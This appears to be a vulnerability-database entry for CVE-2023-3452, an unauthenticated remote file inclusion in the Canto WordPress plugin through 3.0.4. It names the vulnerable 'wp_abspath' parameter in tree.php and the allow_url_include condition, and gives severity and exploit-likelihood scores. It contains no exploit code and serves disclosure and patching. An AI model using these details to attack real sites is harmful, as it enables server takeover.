Cyber Resilience

CVE-2023-3452

Critical

Published: 12 August 2023

Published
12 August 2023
Modified
08 April 2026
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.8711 99.5th percentile
Risk Priority 72 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2023-3452 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in Canto Canto. Its CVSS base score is 9.8 (Critical).

Operationally, ranked in the top 0.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

The Canto plugin for WordPress is vulnerable to remote file inclusion in versions up to and including 3.0.4. The flaw exists in the handling of the wp_abspath parameter within the tree.php component and is tracked as CWE-98. When the PHP allow_url_include directive is enabled on the server, the issue permits inclusion of arbitrary remote files; local file inclusion is also possible if an attacker can place a malicious file via FTP or another upload path readable by the web server. The vulnerability received a CVSS 3.1 score of 9.8.

Unauthenticated attackers can exploit the weakness over the network without any user interaction or credentials. Successful exploitation grants the ability to execute arbitrary PHP code on the affected WordPress server, resulting in full confidentiality, integrity, and availability impact on the host.

Public references include the vulnerable code in the plugin repository and a subsequent changeset (2951888) that modifies tree.php, indicating an official patch has been issued. The current EPSS score of 0.8711, with a recorded peak of 0.8783, reflects sustained exploitation interest following disclosure.

EU & UK References

Vulnerability details

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is…

more

enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

canto
canto
≤ 3.0.4

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References